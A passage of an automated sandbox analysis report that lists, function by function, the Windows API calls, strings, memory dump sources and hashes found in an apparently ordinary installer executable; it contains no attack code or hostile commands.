                                                                              • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 0046447D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad
                                                                              • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                              • API String ID: 2238633743-2683653824
                                                                              • Opcode ID: 43e9449c42c64eafa185df201a3e78782dc27b2a49daecccd0491a4bbbb3dbf6
                                                                              • Instruction ID: aee408708d02c77079155b2370532760acd370d0883c3ae68736bebce920fed0
                                                                              • Opcode Fuzzy Hash: 43e9449c42c64eafa185df201a3e78782dc27b2a49daecccd0491a4bbbb3dbf6
                                                                              • Instruction Fuzzy Hash: 73B09290681740A8CA007BB2289BB0F2A4894B072E7A2463B7008710C6EF7C84204A6E
                                                                              APIs
                                                                              • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D2E0,?,?,?,?,00000000,0047D435,?,?,?,00000000,?,0047D544), ref: 0047D2BC
                                                                              • FindClose.KERNEL32(000000FF,0047D2E7,0047D2E0,?,?,?,?,00000000,0047D435,?,?,?,00000000,?,0047D544,00000000), ref: 0047D2DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileNext
                                                                              • String ID:
                                                                              • API String ID: 2066263336-0
                                                                              • Opcode ID: 1bb33653f71372efa694325d8d6b641fbfb84b71fff8fb7ce2a7bf965ad77fdb
                                                                              • Instruction ID: 813c4c7e096b0537259228c6ce98783779beb739e450e2ccca0bb42f0b61749a
                                                                              • Opcode Fuzzy Hash: 1bb33653f71372efa694325d8d6b641fbfb84b71fff8fb7ce2a7bf965ad77fdb
                                                                              • Instruction Fuzzy Hash: 6A813B30D0024D9FDF11DFA5C845ADFBBB9EF49304F5080EAE808A3292D639AA46CF55
                                                                              APIs
                                                                                • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                              • GetLastError.KERNEL32(00000000,00475595,?,?,0049C1DC,00000000), ref: 0047547E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CountErrorFileLastMoveTick
                                                                              • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                              • API String ID: 2406187244-2685451598
                                                                              • Opcode ID: c178663150e68b17ede051a88a8c0b8e52ebf449323b5d146d45458d51117132
                                                                              • Instruction ID: cb6e190203de8706f01eb9277cb95c8d8a5d25c2e0fbb05709c61410d89611bd
                                                                              • Opcode Fuzzy Hash: c178663150e68b17ede051a88a8c0b8e52ebf449323b5d146d45458d51117132
                                                                              • Instruction Fuzzy Hash: 9E41B770A006099BCB10EFA5D882AEE77B5EF48314F608537E404BB355D7789A418BAD
                                                                              APIs
                                                                              • GetDesktopWindow.USER32 ref: 00413D46
                                                                              • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                • Part of subcall function 00418EC0: 6F58C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                              • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CursorDesktopWindow$Show
                                                                              • String ID:
                                                                              • API String ID: 2074268717-0
                                                                              • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                              • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                              • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                              • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                              • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                              • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString$FileMessageModuleName
                                                                              • String ID:
                                                                              • API String ID: 704749118-0
                                                                              • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                              • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                              • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                              • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                              • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                              • IsRectEmpty.USER32(?), ref: 0044E953
                                                                              • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                              • String ID:
                                                                              • API String ID: 855768636-0
                                                                              • Opcode ID: e9e3cf1fe88063870224b64a3ffaafaa7ea9294743723d0f52b5b35edb71e9c8
                                                                              • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                              • Opcode Fuzzy Hash: e9e3cf1fe88063870224b64a3ffaafaa7ea9294743723d0f52b5b35edb71e9c8
                                                                              • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                              APIs
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 004954F8
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00495513
                                                                              • OffsetRect.USER32(?,?,00000000), ref: 0049552D
                                                                              • OffsetRect.USER32(?,00000000,?), ref: 00495548
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: OffsetRect
                                                                              • String ID:
                                                                              • API String ID: 177026234-0
                                                                              • Opcode ID: 189e9286564265d853a06d191ff0450012ffb6c3854856ebd751307d5f0fca29
                                                                              • Instruction ID: 0cb6fc954a72117405a3be1f948335ff5a15e1e1cf1cb616ea1ff77106a83dd0
                                                                              • Opcode Fuzzy Hash: 189e9286564265d853a06d191ff0450012ffb6c3854856ebd751307d5f0fca29
                                                                              • Instruction Fuzzy Hash: 372181B6700601AFCB00DE69CD85E6B77DAEBC4344F248A2AF944C7249D638ED448755
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 00417260
                                                                              • SetCursor.USER32(00000000), ref: 004172A3
                                                                              • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                              • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                              • String ID:
                                                                              • API String ID: 1959210111-0
                                                                              • Opcode ID: 0923a2c161fc1a9e066ccd67b54e00c3a39e3c999bff849f93405dbd13ead463
                                                                              • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                              • Opcode Fuzzy Hash: 0923a2c161fc1a9e066ccd67b54e00c3a39e3c999bff849f93405dbd13ead463
                                                                              • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                              APIs
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495161
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495175
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 00495189
                                                                              • MulDiv.KERNEL32(?,00000008,?), ref: 004951A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction ID: ece1589fda812a565620013fcb1ed5a997ef569cae5724ba48b6fbd062de1f9b
                                                                              • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                              • Instruction Fuzzy Hash: E8115172A05104AFCB40DEA9D8C5E8B7BECEF4D320B24416AF908DB346D634EC408BA4
                                                                              APIs
                                                                              • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                              • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                              • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                              • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                              • String ID:
                                                                              • API String ID: 4025006896-0
                                                                              • Opcode ID: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                              • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                              • Opcode Fuzzy Hash: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                              • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                              • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047C648,0000000A,00000000), ref: 0040D041
                                                                              • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047C648), ref: 0040D05B
                                                                              • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                              • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                              • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                              • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                              APIs
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00470465
                                                                              Strings
                                                                              • Failed to set NTFS compression state (%d)., xrefs: 00470476
                                                                              • Unsetting NTFS compression on file: %s, xrefs: 0047044B
                                                                              • Setting NTFS compression on file: %s, xrefs: 00470433
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                              • API String ID: 1452528299-3038984924
                                                                              • Opcode ID: a714ca870f106a0b299b69b708085a280bfeb4b7d5a8dbea3a6d3b5799a23f26
                                                                              • Instruction ID: 5508092d392c29e30f7e419f1558a5efa53bd64671fa73d33ea5aa8feab5f6e0
                                                                              • Opcode Fuzzy Hash: a714ca870f106a0b299b69b708085a280bfeb4b7d5a8dbea3a6d3b5799a23f26
                                                                              • Instruction Fuzzy Hash: CA016730E1924896CB14D7AD54812EDBBF49F49308F44C1EFA55DE7382DA781A08879A
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,00000000), ref: 0046FCB9
                                                                              Strings
                                                                              • Failed to set NTFS compression state (%d)., xrefs: 0046FCCA
                                                                              • Setting NTFS compression on directory: %s, xrefs: 0046FC87
                                                                              • Unsetting NTFS compression on directory: %s, xrefs: 0046FC9F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                              • API String ID: 1452528299-1392080489
                                                                              • Opcode ID: d08b5e621045cc5cd0e44a77b6b1f6d9ef736be1227186b37ca663e00f32494c
                                                                              • Instruction ID: 966577c707f49859c08c22ad5a588f09726d737875f6d95343439a3241496ead
                                                                              • Opcode Fuzzy Hash: d08b5e621045cc5cd0e44a77b6b1f6d9ef736be1227186b37ca663e00f32494c
                                                                              • Instruction Fuzzy Hash: 55011720D1824C56CB14D7AD74812DDBBB4AF49314F54C1BFA899E7342EB791A0C879B
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5FE,?,?,?,?,?,00000000,0045B625), ref: 00455DD8
                                                                              • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5FE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                              • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                              • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                              • String ID:
                                                                              • API String ID: 4283692357-0
                                                                              • Opcode ID: 876c7f592335f26f534d3a610f48d9a4b9bf1bdf8c7f8d73d654af2b8de839a9
                                                                              • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                              • Opcode Fuzzy Hash: 876c7f592335f26f534d3a610f48d9a4b9bf1bdf8c7f8d73d654af2b8de839a9
                                                                              • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CountSleepTick
                                                                              • String ID:
                                                                              • API String ID: 2227064392-0
                                                                              • Opcode ID: a059845960953a09b5437104de94e4f2c0855e1466d2a7ed8765463934732ab9
                                                                              • Instruction ID: 6dd2862dcb574814dc985a52fd8bef393983683767be68f312e29577703bd9fd
                                                                              • Opcode Fuzzy Hash: a059845960953a09b5437104de94e4f2c0855e1466d2a7ed8765463934732ab9
                                                                              • Instruction Fuzzy Hash: C4E0E5623291114D862935FE18D25AF4984CBC23A6B2A453FE088D6242C8584D05467F
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC,?,?,?,?,?,0049884B,00000000), ref: 00477D2D
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC,?,?,?,?,?,0049884B), ref: 00477D33
                                                                              • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC), ref: 00477D55
                                                                              • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,00480DAC), ref: 00477D66
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                              • String ID:
                                                                              • API String ID: 215268677-0
                                                                              • Opcode ID: 3a93110a626b43f3eadaa74cf541c0290f0e8f026231ea58c1b57ecd76d8e3ea
                                                                              • Instruction ID: 7d1e0899fa26f13c2a6683c6024d2156ea27cbafc883e2ae306b9283f9cebe78
                                                                              • Opcode Fuzzy Hash: 3a93110a626b43f3eadaa74cf541c0290f0e8f026231ea58c1b57ecd76d8e3ea
